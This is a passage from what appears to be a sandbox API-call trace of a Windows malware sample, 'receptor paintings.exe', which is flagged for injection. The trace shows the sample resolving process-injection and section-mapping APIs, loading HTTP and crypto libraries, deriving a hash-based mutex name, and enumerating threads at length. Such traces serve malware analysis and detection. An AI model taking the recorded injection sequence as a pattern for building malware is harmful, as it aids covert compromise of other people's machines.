(hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.663] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.663] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.664] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.664] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.664] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.665] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.665] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.665] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.665] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.666] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.666] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.666] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.667] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.667] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.667] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.668] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.668] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.668] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.668] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.669] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.669] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.669] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.670] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.670] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.670] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.671] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.671] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.671] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.671] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.672] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.672] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.672] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.673] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.673] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.673] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.673] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.674] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.674] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.674] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.675] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.675] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.677] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.677] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.677] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.678] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.678] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.678] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.679] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.679] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.679] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.679] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.680] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.680] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.680] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.681] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.681] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.681] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.681] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.682] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.682] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.682] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.683] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.683] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.683] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.683] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.684] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.684] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.684] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.685] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.685] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.687] ResumeThread (hThread=0x124) returned 0x1 [0167.687] CloseHandle (hObject=0x124) returned 1 [0167.688] ResumeThread (hThread=0x124) returned 0x1 [0167.688] CloseHandle (hObject=0x124) returned 1 [0167.688] ResumeThread (hThread=0x124) returned 0x1 [0167.688] CloseHandle (hObject=0x124) returned 1 [0167.688] ResumeThread (hThread=0x124) returned 0x1 [0167.688] CloseHandle (hObject=0x124) returned 1 [0167.949] VirtualQuery (in: lpAddress=0x2eaad0, lpBuffer=0x284fb50, dwLength=0x30 | out: lpBuffer=0x284fb50*(BaseAddress=0x2ea000, AllocationBase=0x2a0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0167.949] GetProcessHeap () returned 0x2a0000 [0167.949] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2eaad0 | out: hHeap=0x2a0000) returned 1 [0167.950] VirtualQuery (in: lpAddress=0x2ea8f0, lpBuffer=0x284fb50, dwLength=0x30 | out: lpBuffer=0x284fb50*(BaseAddress=0x2ea000, AllocationBase=0x2a0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0167.950] GetProcessHeap () returned 0x2a0000 [0167.950] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ea8f0 | out: hHeap=0x2a0000) returned 1 [0167.950] RtlExitUserThread (Status=0x0) Process: id = "21" image_name = "receptor paintings.exe" filename = "c:\\program files (x86)\\windows media player\\receptor paintings.exe" page_root = "0x67785000" os_pid = "0x5a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files (x86)\\Windows Media Player\\receptor paintings.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Media Player\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 214 os_tid = 0x9d0 Thread: id = 215 os_tid = 0x594 Thread: id = 216 os_tid = 0xa04 [0165.618] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0165.619] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0165.619] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0165.619] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0165.619] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0165.619] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0165.619] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0165.619] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0165.619] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0165.620] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0165.620] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0165.620] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0165.620] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0165.620] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0165.620] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0165.620] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0165.620] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0165.620] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0165.620] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0165.620] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0165.620] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0165.621] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0165.621] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0165.621] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0165.621] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0165.621] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0165.621] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0165.621] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0165.621] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0165.621] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0165.621] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0165.621] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0165.621] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0165.622] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0165.622] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0165.622] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0165.622] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0165.622] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0165.622] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0165.622] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0165.622] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0165.622] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0165.623] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0165.623] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0165.623] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0165.623] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0165.623] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0165.629] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0165.630] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0165.630] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0165.634] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0165.634] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0165.634] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0165.634] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0165.634] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0165.634] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0165.635] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0165.635] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0165.635] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0165.635] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0165.635] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0165.635] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0165.638] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0165.638] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0165.638] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0165.638] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0165.638] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0165.638] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0165.639] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0165.639] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0165.639] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0165.639] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0165.639] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0165.639] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0165.639] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0165.639] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0165.639] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0165.639] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0165.639] VirtualProtect (in: lpAddress=0xe0000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x237fcac | out: lpflOldProtect=0x237fcac*=0x40) returned 1 [0165.640] VirtualProtect (in: lpAddress=0xe0000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x237fcac | out: lpflOldProtect=0x237fcac*=0x4) returned 1 [0165.641] VirtualQuery (in: lpAddress=0xf0016, lpBuffer=0x237fca4, dwLength=0x1c | out: lpBuffer=0x237fca4*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0165.641] GetProcessHeap () returned 0x8e0000 [0165.641] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x364) returned 0x9005f8 [0165.641] RtlMoveMemory (in: Destination=0x9005f8, Source=0xf0016, Length=0x363 | out: Destination=0x9005f8) [0165.641] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0xf0016) returned 0x0 [0165.641] GetCurrentProcessId () returned 0x5a4 [0165.642] GetProcessHeap () returned 0x8e0000 [0165.642] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x105) returned 0x900968 [0165.642] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x900968, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Media Player\\receptor paintings.exe" (normalized: "c:\\program files (x86)\\windows media player\\receptor paintings.exe")) returned 0x42 [0165.642] GetProcessHeap () returned 0x8e0000 [0165.642] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x105) returned 0x900a78 [0165.642] GetCurrentProcessId () returned 0x5a4 [0165.642] wsprintfA (in: param_1=0x900a78, param_2="%s%d%d%d" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\receptor paintings.exe37084212414443") returned 80 [0165.642] CryptAcquireContextA (in: phProv=0x237fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x237fca8*=0x900bc8) returned 1 [0165.721] CryptCreateHash (in: hProv=0x900bc8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x237fcac | out: phHash=0x237fcac) returned 1 [0165.721] lstrlenA (lpString="C:\\Program Files (x86)\\Windows Media Player\\receptor paintings.exe37084212414443") returned 80 [0165.721] CryptHashData (hHash=0x9014e8, pbData=0x900a78, dwDataLen=0x50, dwFlags=0x0) returned 1 [0165.721] CryptGetHashParam (in: hHash=0x9014e8, dwParam=0x2, pbData=0x237fc98, pdwDataLen=0x237fcb0, dwFlags=0x0 | out: pbData=0x237fc98, pdwDataLen=0x237fcb0) returned 1 [0165.721] wsprintfA (in: param_1=0x900a78, param_2="%02X" | out: param_1="7F") returned 2 [0165.721] wsprintfA (in: param_1=0x900a7a, param_2="%02X" | out: param_1="B9") returned 2 [0165.721] wsprintfA (in: param_1=0x900a7c, param_2="%02X" | out: param_1="42") returned 2 [0165.721] wsprintfA (in: param_1=0x900a7e, param_2="%02X" | out: param_1="A1") returned 2 [0165.721] wsprintfA (in: param_1=0x900a80, param_2="%02X" | out: param_1="63") returned 2 [0165.721] wsprintfA (in: param_1=0x900a82, param_2="%02X" | out: param_1="65") returned 2 [0165.721] wsprintfA (in: param_1=0x900a84, param_2="%02X" | out: param_1="84") returned 2 [0165.721] wsprintfA (in: param_1=0x900a86, param_2="%02X" | out: param_1="82") returned 2 [0165.721] wsprintfA (in: param_1=0x900a88, param_2="%02X" | out: param_1="5A") returned 2 [0165.721] wsprintfA (in: param_1=0x900a8a, param_2="%02X" | out: param_1="88") returned 2 [0165.721] wsprintfA (in: param_1=0x900a8c, param_2="%02X" | out: param_1="90") returned 2 [0165.721] wsprintfA (in: param_1=0x900a8e, param_2="%02X" | out: param_1="6D") returned 2 [0165.721] wsprintfA (in: param_1=0x900a90, param_2="%02X" | out: param_1="27") returned 2 [0165.721] wsprintfA (in: param_1=0x900a92, param_2="%02X" | out: param_1="CE") returned 2 [0165.721] wsprintfA (in: param_1=0x900a94, param_2="%02X" | out: param_1="E0") returned 2 [0165.721] wsprintfA (in: param_1=0x900a96, param_2="%02X" | out: param_1="F7") returned 2 [0165.721] CryptDestroyHash (hHash=0x9014e8) returned 1 [0165.721] CryptReleaseContext (hProv=0x900bc8, dwFlags=0x0) returned 1 [0165.721] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="7FB942A1636584825A88906D27CEE0F7") returned 0x80 [0165.722] GetLastError () returned 0x0 [0165.722] Sleep (dwMilliseconds=0x1f4) [0166.344] GetCurrentProcessId () returned 0x5a4 [0166.344] GetCurrentThreadId () returned 0xa04 [0166.344] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0166.347] Thread32First (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.347] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.347] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.347] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.348] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.348] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.348] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.349] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.349] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.349] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.349] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.350] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.350] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.350] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.351] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.351] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.351] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.352] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.352] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.352] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.352] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.353] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.353] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.353] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.353] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.354] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.354] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.354] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.355] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.355] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.355] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.355] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.356] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.356] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.356] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.357] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.357] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.357] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.357] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.358] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.358] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.358] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.359] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.359] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.359] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.359] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.360] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.360] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.360] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.361] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.361] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.361] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.362] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.362] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.362] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.362] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.363] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.363] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.363] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.364] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.364] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.364] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.365] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.365] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.365] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.365] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.367] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.367] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.368] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.368] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.368] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.368] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.369] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.369] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.369] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.370] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.370] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.370] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.371] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.371] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.371] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.371] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.372] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.372] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.372] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.373] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.373] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.373] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.373] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.374] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.374] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.374] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.375] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.375] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.375] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.376] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.376] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.376] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.376] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.377] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.377] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.377] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.378] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.378] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.481] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.481] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.481] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.482] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.482] Thread32Next 